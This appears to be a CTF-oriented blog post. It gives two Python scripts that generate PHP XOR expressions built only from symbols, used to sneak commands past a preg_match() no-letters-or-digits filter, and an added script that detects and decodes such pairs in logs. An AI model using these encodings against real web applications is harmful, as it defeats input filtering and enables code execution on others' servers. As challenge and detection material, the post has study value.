Scripts for PHP XOR encoding

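I recently did a challenge that uses XOR to bypass preg_match(); the regex requires that the input contain no letters or digits.

Browsing articles online, I collected two scripts.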

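# Given to me by a friend; I don't know which expert originally wrote it
def encode(command):
    # Symbols allowed on both sides of the XOR (no letters, no digits)
    code = "~`!@#$%&*()-=+_[]{};:<>,.?/|"
    result_1 = ""
    result_2 = ""

    for x in command:
        # Find a symbol y such that x ^ y is also a symbol
        for y in code:
            if chr(ord(x) ^ ord(y)) in code:
                result_1 += y
                result_2 += chr(ord(x) ^ ord(y))
                break
        else:
            # Copying x to both sides would XOR to a NUL byte, so fail instead
            raise ValueError(f"no symbol pair for {x!r}")
    return f'("{result_1}" ^ "{result_2}")'

a = encode('ls')
print(a)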

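The second script returns the XOR combinations for every letter; you have to pick them out by hand and assemble the command yourself, or you can adapt the script.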

# Source: 国光
# Article author: 国光
# Article link: https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
# Ahem, looking to freeload the article again? Copyright of this article belongs to the author; any reproduction in any form must credit the source.

import string
from urllib.parse import quote

# Candidate operands: every ASCII code point below 127 that is not a letter
keys = list(range(65)) + list(range(91, 97)) + list(range(123, 127))
results = []
for i in keys:
    for j in keys:
        ascii_number = i ^ j
        # Keep only pairs whose XOR is a letter (A-Z or a-z)
        if (65 <= ascii_number <= 90) or (97 <= ascii_number <= 122):
            # Control characters (< 32) are shown by code point, others literally
            if i < 32 and j < 32:
                temp = (f'{chr(ascii_number)} = ascii:{i} ^ ascii:{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(ascii_number))
                results.append(temp)
            elif i < 32 and j >= 32:
                temp = (f'{chr(ascii_number)} = ascii:{i} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(ascii_number))
                results.append(temp)
            elif i >= 32 and j < 32:
                temp = (f'{chr(ascii_number)} = {chr(i)} ^ ascii:{j} = {quote(chr(i))} ^ {quote(chr(j))}', chr(ascii_number))
                results.append(temp)
            else:
                temp = (f'{chr(ascii_number)} = {chr(i)} ^ {chr(j)} = {quote(chr(i))} ^ {quote(chr(j))}', chr(ascii_number))
                results.append(temp)

# Group the output by resulting letter: lowercase first, then uppercase
results.sort(key=lambda x: x[1], reverse=False)
for low_case in string.ascii_lowercase:
    for result in results:
        if result[1] == low_case:
            print(result[0])

for upper_case in string.ascii_uppercase:
    for result in results:
        if result[1] == upper_case:
            print(result[0])
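
Going the other way is useful when reviewing logs or a filter: the following added example (not from the original post or the cited article) finds `"a" ^ "b"` literal pairs in a payload, XORs them the way PHP does, and reports whether the operands would pass a no-letters-or-digits check. The name `find_xor_words` and the sample strings are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Two quoted literals joined by ^, e.g. ("@(" ^ ",["). Backslash escapes in
# the literals are not handled (the alphabets used above contain none).
XOR_PAIR = re.compile(
    r"""(['"])((?:(?!\1).)*)\1\s*\^\s*(['"])((?:(?!\3).)*)\3""", re.DOTALL)
ALNUM = re.compile(rb"[A-Za-z0-9]")


def find_xor_words(payload, url_encoded=False):
    """Return (plaintext, evades_filter) for every "a" ^ "b" pair in payload.

    evades_filter is True when neither operand contains a letter or digit
    although the XOR result does.
    """
    found = []
    for m in XOR_PAIR.finditer(payload):
        raw = (m.group(2), m.group(4))
        if url_encoded:  # request data as logged, before URL-decoding
            a, b = (unquote_to_bytes(s) for s in raw)
        else:
            a, b = (s.encode("utf-8") for s in raw)
        # PHP XORs strings byte by byte and stops at the shorter operand
        plain = bytes(x ^ y for x, y in zip(a, b))
        evades = not ALNUM.search(a + b) and bool(ALNUM.search(plain))
        found.append((plain.decode("latin-1"), evades))
    return found


# Constructed samples: the first script's output for 'ls', the same word built
# from URL-encoded pairs as listed by the second script, and ordinary code.
SAMPLES = [
    ('("@(" ^ ",[")', False),
    ('"%0C%13"^"%60%60"', True),
    ('$a = "x" . "y";', False),  # no XOR pair, nothing reported
]

if __name__ == "__main__":
    for text, enc in SAMPLES:
        print(text, "->", find_xor_words(text, url_encoded=enc))
```
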

 
